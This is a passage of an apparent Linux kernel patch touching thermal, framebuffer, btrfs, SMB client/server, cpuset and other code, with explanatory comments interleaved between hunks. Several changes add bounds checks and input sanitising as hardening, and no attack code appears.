+ 				  components, &ses_enclosure_callbacks);
+diff --git a/drivers/thermal/intel/therm_throt.c b/drivers/thermal/intel/therm_throt.c
+index 2e22bb82b7389..e69868e868eb9 100644
+--- a/drivers/thermal/intel/therm_throt.c
++++ b/drivers/thermal/intel/therm_throt.c
+@@ -193,8 +193,67 @@ static const struct attribute_group thermal_attr_group = {
+ #define THERM_THROT_POLL_INTERVAL	HZ
+ #define THERM_STATUS_PROCHOT_LOG	BIT(1)
+ 
+-#define THERM_STATUS_CLEAR_CORE_MASK (BIT(1) | BIT(3) | BIT(5) | BIT(7) | BIT(9) | BIT(11) | BIT(13) | BIT(15))
+-#define THERM_STATUS_CLEAR_PKG_MASK  (BIT(1) | BIT(3) | BIT(5) | BIT(7) | BIT(9) | BIT(11))
++static u64 therm_intr_core_clear_mask;
++static u64 therm_intr_pkg_clear_mask;
++
++static void thermal_intr_init_core_clear_mask(void)
++{
++	if (therm_intr_core_clear_mask)
++		return;
++
++	/*
++	 * Reference: Intel SDM  Volume 4
++	 * "Table 2-2. IA-32 Architectural MSRs", MSR 0x19C
++	 * IA32_THERM_STATUS.
++	 */
++
++	/*
++	 * Bit 1, 3, 5: CPUID.01H:EDX[22] = 1. This driver will not
++	 * enable interrupts, when 0 as it checks for X86_FEATURE_ACPI.
++	 */
++	therm_intr_core_clear_mask = (BIT(1) | BIT(3) | BIT(5));
++
++	/*
++	 * Bit 7 and 9: Thermal Threshold #1 and #2 log
++	 * If CPUID.01H:ECX[8] = 1
++	 */
++	if (boot_cpu_has(X86_FEATURE_TM2))
++		therm_intr_core_clear_mask |= (BIT(7) | BIT(9));
++
++	/* Bit 11: Power Limitation log (R/WC0) If CPUID.06H:EAX[4] = 1 */
++	if (boot_cpu_has(X86_FEATURE_PLN))
++		therm_intr_core_clear_mask |= BIT(11);
++
++	/*
++	 * Bit 13: Current Limit log (R/WC0) If CPUID.06H:EAX[7] = 1
++	 * Bit 15: Cross Domain Limit log (R/WC0) If CPUID.06H:EAX[7] = 1
++	 */
++	if (boot_cpu_has(X86_FEATURE_HWP))
++		therm_intr_core_clear_mask |= (BIT(13) | BIT(15));
++}
++
++static void thermal_intr_init_pkg_clear_mask(void)
++{
++	if (therm_intr_pkg_clear_mask)
++		return;
++
++	/*
++	 * Reference: Intel SDM  Volume 4
++	 * "Table 2-2. IA-32 Architectural MSRs", MSR 0x1B1
++	 * IA32_PACKAGE_THERM_STATUS.
++	 */
++
++	/* All bits except BIT 26 depend on CPUID.06H: EAX[6] = 1 */
++	if (boot_cpu_has(X86_FEATURE_PTS))
++		therm_intr_pkg_clear_mask = (BIT(1) | BIT(3) | BIT(5) | BIT(7) | BIT(9) | BIT(11));
++
++	/*
++	 * Intel SDM Volume 2A: Thermal and Power Management Leaf
++	 * Bit 26: CPUID.06H: EAX[19] = 1
++	 */
++	if (boot_cpu_has(X86_FEATURE_HFI))
++		therm_intr_pkg_clear_mask |= BIT(26);
++}
+ 
+ /*
+  * Clear the bits in package thermal status register for bit = 1
+@@ -207,13 +266,10 @@ void thermal_clear_package_intr_status(int level, u64 bit_mask)
+ 
+ 	if (level == CORE_LEVEL) {
+ 		msr  = MSR_IA32_THERM_STATUS;
+-		msr_val = THERM_STATUS_CLEAR_CORE_MASK;
++		msr_val = therm_intr_core_clear_mask;
+ 	} else {
+ 		msr  = MSR_IA32_PACKAGE_THERM_STATUS;
+-		msr_val = THERM_STATUS_CLEAR_PKG_MASK;
+-		if (boot_cpu_has(X86_FEATURE_HFI))
+-			msr_val |= BIT(26);
+-
++		msr_val = therm_intr_pkg_clear_mask;
+ 	}
+ 
+ 	msr_val &= ~bit_mask;
+@@ -708,6 +764,9 @@ void intel_init_thermal(struct cpuinfo_x86 *c)
+ 	h = THERMAL_APIC_VECTOR | APIC_DM_FIXED | APIC_LVT_MASKED;
+ 	apic_write(APIC_LVTTHMR, h);
+ 
++	thermal_intr_init_core_clear_mask();
++	thermal_intr_init_pkg_clear_mask();
++
+ 	rdmsr(MSR_IA32_THERM_INTERRUPT, l, h);
+ 	if (cpu_has(c, X86_FEATURE_PLN) && !int_pln_enable)
+ 		wrmsr(MSR_IA32_THERM_INTERRUPT,
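+/*
+ * The therm_throt change builds the clear masks once, from the CPUID
+ * feature bits that gate each log bit in the SDM tables it cites,
+ * instead of always writing a fixed constant. Clearing status bits a
+ * CPU does not implement risks unchecked-MSR-access warnings on parts
+ * that lack them. The pattern, reduced:
+ *
+ *	mask = BIT(1) | BIT(3) | BIT(5);   /- base, gated by X86_FEATURE_ACPI -/
+ *	if (boot_cpu_has(X86_FEATURE_TM2)) mask |= BIT(7) | BIT(9);
+ *	if (boot_cpu_has(X86_FEATURE_PLN)) mask |= BIT(11);
+ *	if (boot_cpu_has(X86_FEATURE_HWP)) mask |= BIT(13) | BIT(15);
+ */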
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index 2bc8baa90c0f2..fa205be94a4b8 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -823,7 +823,7 @@ static int set_con2fb_map(int unit, int newidx, int user)
+ 	int oldidx = con2fb_map[unit];
+ 	struct fb_info *info = fbcon_registered_fb[newidx];
+ 	struct fb_info *oldinfo = NULL;
+-	int found, err = 0, show_logo;
++	int err = 0, show_logo;
+ 
+ 	WARN_CONSOLE_UNLOCKED();
+ 
+@@ -841,26 +841,26 @@ static int set_con2fb_map(int unit, int newidx, int user)
+ 	if (oldidx != -1)
+ 		oldinfo = fbcon_registered_fb[oldidx];
+ 
+-	found = search_fb_in_map(newidx);
+-
+-	if (!err && !found) {
++	if (!search_fb_in_map(newidx)) {
+ 		err = con2fb_acquire_newinfo(vc, info, unit);
+-		if (!err)
+-			con2fb_map[unit] = newidx;
++		if (err)
++			return err;
++
++		fbcon_add_cursor_work(info);
+ 	}
+ 
++	con2fb_map[unit] = newidx;
++
+ 	/*
+ 	 * If old fb is not mapped to any of the consoles,
+ 	 * fbcon should release it.
+ 	 */
+-	if (!err && oldinfo && !search_fb_in_map(oldidx))
++	if (oldinfo && !search_fb_in_map(oldidx))
+ 		con2fb_release_oldinfo(vc, oldinfo, info);
+ 
+ 	show_logo = (fg_console == 0 && !user &&
+ 			 logo_shown != FBCON_LOGO_DONTSHOW);
+ 
+-	if (!found)
+-		fbcon_add_cursor_work(info);
+ 	con2fb_map_boot[unit] = newidx;
+ 	con2fb_init_display(vc, info, unit, show_logo);
+ 
+diff --git a/drivers/video/fbdev/core/fbmem.c b/drivers/video/fbdev/core/fbmem.c
+index ab3545a00abc5..aa2cb36af3f1e 100644
+--- a/drivers/video/fbdev/core/fbmem.c
++++ b/drivers/video/fbdev/core/fbmem.c
+@@ -1117,6 +1117,8 @@ static long do_fb_ioctl(struct fb_info *info, unsigned int cmd,
+ 	case FBIOPUT_VSCREENINFO:
+ 		if (copy_from_user(&var, argp, sizeof(var)))
+ 			return -EFAULT;
++		/* only for kernel-internal use */
++		var.activate &= ~FB_ACTIVATE_KD_TEXT;
+ 		console_lock();
+ 		lock_fb_info(info);
+ 		ret = fbcon_modechange_possible(info, &var);
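+/*
+ * The fbmem hunk strips FB_ACTIVATE_KD_TEXT from the userspace-supplied
+ * var.activate: that flag selects a console-switching path only kernel
+ * callers are prepared for, so an FBIOPUT_VSCREENINFO ioctl must not be
+ * able to set it.
+ */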
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index fde40112a2593..174d196d69609 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -2433,6 +2433,20 @@ static int btrfs_init_csum_hash(struct btrfs_fs_info *fs_info, u16 csum_type)
+ 
+ 	fs_info->csum_shash = csum_shash;
+ 
++	/*
++	 * Check if the checksum implementation is a fast accelerated one.
++	 * As-is this is a bit of a hack and should be replaced once the csum
++	 * implementations provide that information themselves.
++	 */
++	switch (csum_type) {
++	case BTRFS_CSUM_TYPE_CRC32:
++		if (!strstr(crypto_shash_driver_name(csum_shash), "generic"))
++			set_bit(BTRFS_FS_CSUM_IMPL_FAST, &fs_info->flags);
++		break;
++	default:
++		break;
++	}
++
+ 	btrfs_info(fs_info, "using %s (%s) checksum algorithm",
+ 			btrfs_super_csum_name(csum_type),
+ 			crypto_shash_driver_name(csum_shash));
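+/*
+ * The detection of a "fast" checksum implementation moves here from
+ * btrfs_mount_root() (see the super.c hunk below), so it now runs for
+ * whichever csum type the superblock selects rather than assuming
+ * crc32c. The strstr(..., "generic") test - flagged in the comment as
+ * a stopgap - relies on the crypto layer naming its unaccelerated
+ * drivers "*-generic", e.g. "crc32c-generic" vs "crc32c-intel".
+ */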
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 433ce221dc5c7..3f3c8f9186f90 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -1515,8 +1515,6 @@ static struct dentry *btrfs_mount_root(struct file_system_type *fs_type,
+ 		shrinker_debugfs_rename(&s->s_shrink, "sb-%s:%s", fs_type->name,
+ 					s->s_id);
+ 		btrfs_sb(s)->bdev_holder = fs_type;
+-		if (!strstr(crc32c_impl(), "generic"))
+-			set_bit(BTRFS_FS_CSUM_IMPL_FAST, &fs_info->flags);
+ 		error = btrfs_fill_super(s, fs_devices, data);
+ 	}
+ 	if (!error)
+@@ -1630,6 +1628,8 @@ static void btrfs_resize_thread_pool(struct btrfs_fs_info *fs_info,
+ 	btrfs_workqueue_set_max(fs_info->hipri_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->delalloc_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->caching_workers, new_pool_size);
++	workqueue_set_max_active(fs_info->endio_workers, new_pool_size);
++	workqueue_set_max_active(fs_info->endio_meta_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->endio_write_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->endio_freespace_worker, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->delayed_workers, new_pool_size);
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index b37379b62cc77..ab59faf8a06a7 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -588,11 +588,15 @@ assemble_neg_contexts(struct smb2_negotiate_req *req,
+ 
+ }
+ 
++/* If invalid preauth context warn but use what we requested, SHA-512 */
+ static void decode_preauth_context(struct smb2_preauth_neg_context *ctxt)
+ {
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+-	/* If invalid preauth context warn but use what we requested, SHA-512 */
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one HashAlgorithms member is accounted for.
++	 */
+ 	if (len < MIN_PREAUTH_CTXT_DATA_LEN) {
+ 		pr_warn_once("server sent bad preauth context\n");
+ 		return;
+@@ -611,7 +615,11 @@ static void decode_compress_ctx(struct TCP_Server_Info *server,
+ {
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+-	/* sizeof compress context is a one element compression capbility struct */
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one CompressionAlgorithms member is accounted
++	 * for.
++	 */
+ 	if (len < 10) {
+ 		pr_warn_once("server sent bad compression cntxt\n");
+ 		return;
+@@ -633,6 +641,11 @@ static int decode_encrypt_ctx(struct TCP_Server_Info *server,
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+ 	cifs_dbg(FYI, "decode SMB3.11 encryption neg context of len %d\n", len);
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one Cipher flexible array member is accounted
++	 * for.
++	 */
+ 	if (len < MIN_ENCRYPT_CTXT_DATA_LEN) {
+ 		pr_warn_once("server sent bad crypto ctxt len\n");
+ 		return -EINVAL;
+@@ -679,6 +692,11 @@ static void decode_signing_ctx(struct TCP_Server_Info *server,
+ {
+ 	unsigned int len = le16_to_cpu(pctxt->DataLength);
+ 
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one SigningAlgorithms flexible array member is
++	 * accounted for.
++	 */
+ 	if ((len < 4) || (len > 16)) {
+ 		pr_warn_once("server sent bad signing negcontext\n");
+ 		return;
+@@ -720,14 +738,19 @@ static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
+ 	for (i = 0; i < ctxt_cnt; i++) {
+ 		int clen;
+ 		/* check that offset is not beyond end of SMB */
+-		if (len_of_ctxts == 0)
+-			break;
+-
+ 		if (len_of_ctxts < sizeof(struct smb2_neg_context))
+ 			break;
+ 
+ 		pctx = (struct smb2_neg_context *)(offset + (char *)rsp);
+-		clen = le16_to_cpu(pctx->DataLength);
++		clen = sizeof(struct smb2_neg_context)
++			+ le16_to_cpu(pctx->DataLength);
++		/*
++		 * 2.2.4 SMB2 NEGOTIATE Response
++		 * Subsequent negotiate contexts MUST appear at the first 8-byte
++		 * aligned offset following the previous negotiate context.
++		 */
++		if (i + 1 != ctxt_cnt)
++			clen = ALIGN(clen, 8);
+ 		if (clen > len_of_ctxts)
+ 			break;
+ 
+@@ -748,12 +771,10 @@ static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
+ 		else
+ 			cifs_server_dbg(VFS, "unknown negcontext of type %d ignored\n",
+ 				le16_to_cpu(pctx->ContextType));
+-
+ 		if (rc)
+ 			break;
+-		/* offsets must be 8 byte aligned */
+-		clen = ALIGN(clen, 8);
+-		offset += clen + sizeof(struct smb2_neg_context);
++
++		offset += clen;
+ 		len_of_ctxts -= clen;
+ 	}
+ 	return rc;
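+/*
+ * Shape of the SMB 3.1.1 negotiate-context walk after the cifs fix,
+ * reduced to the length arithmetic (hypothetical standalone helper,
+ * not the upstream function). Each context occupies its 8-byte header
+ * plus DataLength bytes; every context except the last is then padded
+ * to the next 8-byte boundary. The old loop bound-checked DataLength
+ * alone, without the header, and padded even the final context.
+ */
+static int walk_neg_contexts(const char *rsp, int offset, int len_of_ctxts,
+			     int ctxt_cnt)
+{
+	int i;
+
+	for (i = 0; i < ctxt_cnt; i++) {
+		const struct smb2_neg_context *pctx;
+		int clen;
+
+		if (len_of_ctxts < sizeof(struct smb2_neg_context))
+			break;
+		pctx = (const struct smb2_neg_context *)(rsp + offset);
+		clen = sizeof(*pctx) + le16_to_cpu(pctx->DataLength);
+		if (i + 1 != ctxt_cnt)		/* no pad after the last one */
+			clen = ALIGN(clen, 8);
+		if (clen > len_of_ctxts)
+			break;
+		/* ... dispatch on pctx->ContextType here ... */
+		offset += clen;
+		len_of_ctxts -= clen;
+	}
+	return 0;
+}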
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 7e0b62f94a079..32a837014cbfc 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -872,17 +872,21 @@ static void assemble_neg_contexts(struct ksmbd_conn *conn,
+ }
+ 
+ static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
+-				  struct smb2_preauth_neg_context *pneg_ctxt)
++				  struct smb2_preauth_neg_context *pneg_ctxt,
++				  int len_of_ctxts)
+ {
+-	__le32 err = STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
++	/*
++	 * sizeof(smb2_preauth_neg_context) assumes SMB311_SALT_SIZE Salt,
++	 * which may not be present. Check only for the one HashAlgorithms entry in use.
++	 */
++	if (len_of_ctxts < MIN_PREAUTH_CTXT_DATA_LEN)
++		return STATUS_INVALID_PARAMETER;
+ 
+-	if (pneg_ctxt->HashAlgorithms == SMB2_PREAUTH_INTEGRITY_SHA512) {
+-		conn->preauth_info->Preauth_HashId =
+-			SMB2_PREAUTH_INTEGRITY_SHA512;
+-		err = STATUS_SUCCESS;
+-	}
++	if (pneg_ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
++		return STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
+ 
+-	return err;
++	conn->preauth_info->Preauth_HashId = SMB2_PREAUTH_INTEGRITY_SHA512;
++	return STATUS_SUCCESS;
+ }
+ 
+ static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
+@@ -1010,7 +1014,8 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 				break;
+ 
+ 			status = decode_preauth_ctxt(conn,
+-						     (struct smb2_preauth_neg_context *)pctx);
++						     (struct smb2_preauth_neg_context *)pctx,
++						     len_of_ctxts);
+ 			if (status != STATUS_SUCCESS)
+ 				break;
+ 		} else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES) {
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index db6ec828aa4b2..7e8e8633ad905 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1623,6 +1623,8 @@ pci_alloc_irq_vectors(struct pci_dev *dev, unsigned int min_vecs,
+ 					      flags, NULL);
+ }
+ 
++static inline bool pci_msix_can_alloc_dyn(struct pci_dev *dev)
++{ return false; }
+ static inline struct msi_map pci_msix_alloc_irq_at(struct pci_dev *dev, unsigned int index,
+ 						   const struct irq_affinity_desc *affdesc)
+ {
+diff --git a/include/linux/rtnetlink.h b/include/linux/rtnetlink.h
+index 92ad75549e9cd..b6e6378dcbbd7 100644
+--- a/include/linux/rtnetlink.h
++++ b/include/linux/rtnetlink.h
+@@ -25,7 +25,8 @@ void rtmsg_ifinfo_newnet(int type, struct net_device *dev, unsigned int change,
+ struct sk_buff *rtmsg_ifinfo_build_skb(int type, struct net_device *dev,
+ 				       unsigned change, u32 event,
+ 				       gfp_t flags, int *new_nsid,
+-				       int new_ifindex, u32 portid, u32 seq);
++				       int new_ifindex, u32 portid,
++				       const struct nlmsghdr *nlh);
+ void rtmsg_ifinfo_send(struct sk_buff *skb, struct net_device *dev,
+ 		       gfp_t flags, u32 portid, const struct nlmsghdr *nlh);
+ 
+diff --git a/include/linux/trace.h b/include/linux/trace.h
+index 80ffda8717491..2a70a447184c9 100644
+--- a/include/linux/trace.h
++++ b/include/linux/trace.h
+@@ -33,6 +33,18 @@ struct trace_array;
+ int register_ftrace_export(struct trace_export *export);
+ int unregister_ftrace_export(struct trace_export *export);
+ 
++/**
++ * trace_array_puts - write a constant string into the trace buffer.
++ * @tr:    The trace array to write to
++ * @str:   The constant string to write
++ */
++#define trace_array_puts(tr, str)					\
++	({								\
++		str ? __trace_array_puts(tr, _THIS_IP_, str, strlen(str)) : -1;	\
++	})
++int __trace_array_puts(struct trace_array *tr, unsigned long ip,
++		       const char *str, int size);
++
+ void trace_printk_init_buffers(void);
+ __printf(3, 4)
+ int trace_array_printk(struct trace_array *tr, unsigned long ip,
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 7254edfba4c9c..ffb89b98b2714 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -954,6 +954,7 @@ enum {
+ 	HCI_CONN_STK_ENCRYPT,
+ 	HCI_CONN_AUTH_INITIATOR,
+ 	HCI_CONN_DROP,
++	HCI_CONN_CANCEL,
+ 	HCI_CONN_PARAM_REMOVAL_PEND,
+ 	HCI_CONN_NEW_LINK_KEY,
+ 	HCI_CONN_SCANNING,
+diff --git a/include/net/bonding.h b/include/net/bonding.h
+index ea36ab7f9e724..c3843239517d5 100644
+--- a/include/net/bonding.h
++++ b/include/net/bonding.h
+@@ -761,13 +761,17 @@ static inline int bond_get_targets_ip(__be32 *targets, __be32 ip)
+ #if IS_ENABLED(CONFIG_IPV6)
+ static inline int bond_get_targets_ip6(struct in6_addr *targets, struct in6_addr *ip)
+ {
++	struct in6_addr mcaddr;
+ 	int i;
+ 
+-	for (i = 0; i < BOND_MAX_NS_TARGETS; i++)
+-		if (ipv6_addr_equal(&targets[i], ip))
++	for (i = 0; i < BOND_MAX_NS_TARGETS; i++) {
++		addrconf_addr_solict_mult(&targets[i], &mcaddr);
++		if ((ipv6_addr_equal(&targets[i], ip)) ||
++		    (ipv6_addr_equal(&mcaddr, ip)))
+ 			return i;
+ 		else if (ipv6_addr_any(&targets[i]))
+ 			break;
++	}
+ 
+ 	return -1;
+ }
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index add5cff7952c5..14d4fa6468417 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -962,7 +962,7 @@ static void __io_req_complete_post(struct io_kiocb *req)
+ 
+ void io_req_complete_post(struct io_kiocb *req, unsigned issue_flags)
+ {
+-	if (req->ctx->task_complete && (issue_flags & IO_URING_F_IOWQ)) {
++	if (req->ctx->task_complete && req->ctx->submitter_task != current) {
+ 		req->io_task_work.func = io_req_task_complete;
+ 		io_req_task_work_add(req);
+ 	} else if (!(issue_flags & IO_URING_F_UNLOCKED) ||
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index ca826bd1eba33..e89af77e74255 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -1513,7 +1513,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+ 	spin_unlock_irq(&callback_lock);
+ 
+ 	if (adding || deleting)
+-		update_tasks_cpumask(parent, tmp->new_cpus);
++		update_tasks_cpumask(parent, tmp->addmask);
+ 
+ 	/*
+ 	 * Set or clear CS_SCHED_LOAD_BALANCE when partcmd_update, if necessary.
+@@ -1770,10 +1770,13 @@ static int update_cpumask(struct cpuset *cs, struct cpuset *trialcs,
+ 	/*
+ 	 * Use the cpumasks in trialcs for tmpmasks when they are pointers
+ 	 * to allocated cpumasks.
++	 *
++	 * Note that update_parent_subparts_cpumask() uses only addmask &
++	 * delmask, but not new_cpus.
+ 	 */
+ 	tmp.addmask  = trialcs->subparts_cpus;
+ 	tmp.delmask  = trialcs->effective_cpus;
+-	tmp.new_cpus = trialcs->cpus_allowed;
++	tmp.new_cpus = NULL;
+ #endif
+ 
+ 	retval = validate_change(cs, trialcs);
+@@ -1838,6 +1841,11 @@ static int update_cpumask(struct cpuset *cs, struct cpuset *trialcs,
+ 	}
+ 	spin_unlock_irq(&callback_lock);
+ 
++#ifdef CONFIG_CPUMASK_OFFSTACK
++	/* Now trialcs->cpus_allowed is available */
++	tmp.new_cpus = trialcs->cpus_allowed;
++#endif
++
+ 	/* effective_cpus will be updated here */
+ 	update_cpumasks_hier(cs, &tmp, false);
+ 
+@@ -2445,6 +2453,20 @@ static int fmeter_getrate(struct fmeter *fmp)
+ 
+ static struct cpuset *cpuset_attach_old_cs;
+ 
++/*
++ * Check to see if a cpuset can accept a new task
++ * For v1, cpus_allowed and mems_allowed can't be empty.
++ * For v2, effective_cpus can't be empty.
++ * Note that in v1, effective_cpus = cpus_allowed.
++ */
++static int cpuset_can_attach_check(struct cpuset *cs)
++{
++	if (cpumask_empty(cs->effective_cpus) ||
++	   (!is_in_v2_mode() && nodes_empty(cs->mems_allowed)))
++		return -ENOSPC;
++	return 0;
++}
++
+ /* Called by cgroups to determine if a cpuset is usable; cpuset_rwsem held */
+ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ {
+@@ -2459,16 +2481,9 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 
+ 	percpu_down_write(&cpuset_rwsem);
+ 
+-	/* allow moving tasks into an empty cpuset if on default hierarchy */
+-	ret = -ENOSPC;
+-	if (!is_in_v2_mode() &&
+-	    (cpumask_empty(cs->cpus_allowed) || nodes_empty(cs->mems_allowed)))
+-		goto out_unlock;
+-
+-	/*
+-	 * Task cannot be moved to a cpuset with empty effective cpus.
+-	 */
+-	if (cpumask_empty(cs->effective_cpus))
++	/* Check to see if task is allowed in the cpuset */
++	ret = cpuset_can_attach_check(cs);
++	if (ret)
+ 		goto out_unlock;
+ 
+ 	cgroup_taskset_for_each(task, css, tset) {
+@@ -2485,7 +2500,6 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 	 * changes which zero cpus/mems_allowed.
+ 	 */
+ 	cs->attach_in_progress++;
+-	ret = 0;
+ out_unlock:
+ 	percpu_up_write(&cpuset_rwsem);
+ 	return ret;
+@@ -2494,25 +2508,46 @@ out_unlock:
+ static void cpuset_cancel_attach(struct cgroup_taskset *tset)
+ {
+ 	struct cgroup_subsys_state *css;
++	struct cpuset *cs;
+ 
+ 	cgroup_taskset_first(tset, &css);
++	cs = css_cs(css);
+ 
+ 	percpu_down_write(&cpuset_rwsem);
+-	css_cs(css)->attach_in_progress--;
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
+ 	percpu_up_write(&cpuset_rwsem);
+ }
+ 
+ /*
+- * Protected by cpuset_rwsem.  cpus_attach is used only by cpuset_attach()
++ * Protected by cpuset_rwsem. cpus_attach is used only by cpuset_attach_task()
+  * but we can't allocate it dynamically there.  Define it global and
+  * allocate from cpuset_init().
+  */
+ static cpumask_var_t cpus_attach;
++static nodemask_t cpuset_attach_nodemask_to;
++
++static void cpuset_attach_task(struct cpuset *cs, struct task_struct *task)
++{
++	percpu_rwsem_assert_held(&cpuset_rwsem);
++
++	if (cs != &top_cpuset)
++		guarantee_online_cpus(task, cpus_attach);
++	else
++		cpumask_copy(cpus_attach, task_cpu_possible_mask(task));
++	/*
++	 * can_attach beforehand should guarantee that this doesn't
++	 * fail.  TODO: have a better way to handle failure here
++	 */
++	WARN_ON_ONCE(set_cpus_allowed_ptr(task, cpus_attach));
++
++	cpuset_change_task_nodemask(task, &cpuset_attach_nodemask_to);
++	cpuset_update_task_spread_flags(cs, task);
++}
+ 
+ static void cpuset_attach(struct cgroup_taskset *tset)
+ {
+-	/* static buf protected by cpuset_rwsem */
+-	static nodemask_t cpuset_attach_nodemask_to;
+ 	struct task_struct *task;
+ 	struct task_struct *leader;
+ 	struct cgroup_subsys_state *css;
+@@ -2543,20 +2578,8 @@ static void cpuset_attach(struct cgroup_taskset *tset)
+ 
+ 	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
+ 
+-	cgroup_taskset_for_each(task, css, tset) {
+-		if (cs != &top_cpuset)
+-			guarantee_online_cpus(task, cpus_attach);
+-		else
+-			cpumask_copy(cpus_attach, task_cpu_possible_mask(task));
+-		/*
+-		 * can_attach beforehand should guarantee that this doesn't
+-		 * fail.  TODO: have a better way to handle failure here
+-		 */
+-		WARN_ON_ONCE(set_cpus_allowed_ptr(task, cpus_attach));
+-
+-		cpuset_change_task_nodemask(task, &cpuset_attach_nodemask_to);
+-		cpuset_update_task_spread_flags(cs, task);
+-	}
++	cgroup_taskset_for_each(task, css, tset)
++		cpuset_attach_task(cs, task);
+ 
+ 	/*
+ 	 * Change mm for all threadgroup leaders. This is expensive and may
+@@ -3247,6 +3270,68 @@ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+ 	percpu_up_write(&cpuset_rwsem);
+ }
+ 
++/*
++ * In case the child is cloned into a cpuset different from its parent,
++ * additional checks are done to see if the move is allowed.
++ */
++static int cpuset_can_fork(struct task_struct *task, struct css_set *cset)
++{
++	struct cpuset *cs = css_cs(cset->subsys[cpuset_cgrp_id]);
++	bool same_cs;
++	int ret;
++
++	rcu_read_lock();
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs)
++		return 0;
++
++	lockdep_assert_held(&cgroup_mutex);
++	percpu_down_write(&cpuset_rwsem);
++
++	/* Check to see if task is allowed in the cpuset */
++	ret = cpuset_can_attach_check(cs);
++	if (ret)
++		goto out_unlock;
++
++	ret = task_can_attach(task, cs->effective_cpus);
++	if (ret)
++		goto out_unlock;
++
++	ret = security_task_setscheduler(task);
++	if (ret)
++		goto out_unlock;
++
++	/*
++	 * Mark attach is in progress.  This makes validate_change() fail
++	 * changes which zero cpus/mems_allowed.
++	 */
++	cs->attach_in_progress++;
++out_unlock:
++	percpu_up_write(&cpuset_rwsem);
++	return ret;
++}
++
++static void cpuset_cancel_fork(struct task_struct *task, struct css_set *cset)
++{
++	struct cpuset *cs = css_cs(cset->subsys[cpuset_cgrp_id]);
++	bool same_cs;
++
++	rcu_read_lock();
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs)
++		return;
++
++	percpu_down_write(&cpuset_rwsem);
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
++	percpu_up_write(&cpuset_rwsem);
++}
++
+ /*
+  * Make sure the new task conform to the current state of its parent,
+  * which could have been changed by cpuset just after it inherits the
+@@ -3254,11 +3339,33 @@ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+  */
+ static void cpuset_fork(struct task_struct *task)
+ {
+-	if (task_css_is_root(task, cpuset_cgrp_id))
++	struct cpuset *cs;
++	bool same_cs;
++
++	rcu_read_lock();
++	cs = task_cs(task);
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs) {
++		if (cs == &top_cpuset)
++			return;
++
++		set_cpus_allowed_ptr(task, current->cpus_ptr);
++		task->mems_allowed = current->mems_allowed;
+ 		return;
++	}
++
++	/* CLONE_INTO_CGROUP */
++	percpu_down_write(&cpuset_rwsem);
++	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
++	cpuset_attach_task(cs, task);
++
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
+ 
+-	set_cpus_allowed_ptr(task, current->cpus_ptr);
+-	task->mems_allowed = current->mems_allowed;
++	percpu_up_write(&cpuset_rwsem);
+ }
+ 
+ struct cgroup_subsys cpuset_cgrp_subsys = {
+@@ -3271,6 +3378,8 @@ struct cgroup_subsys cpuset_cgrp_subsys = {
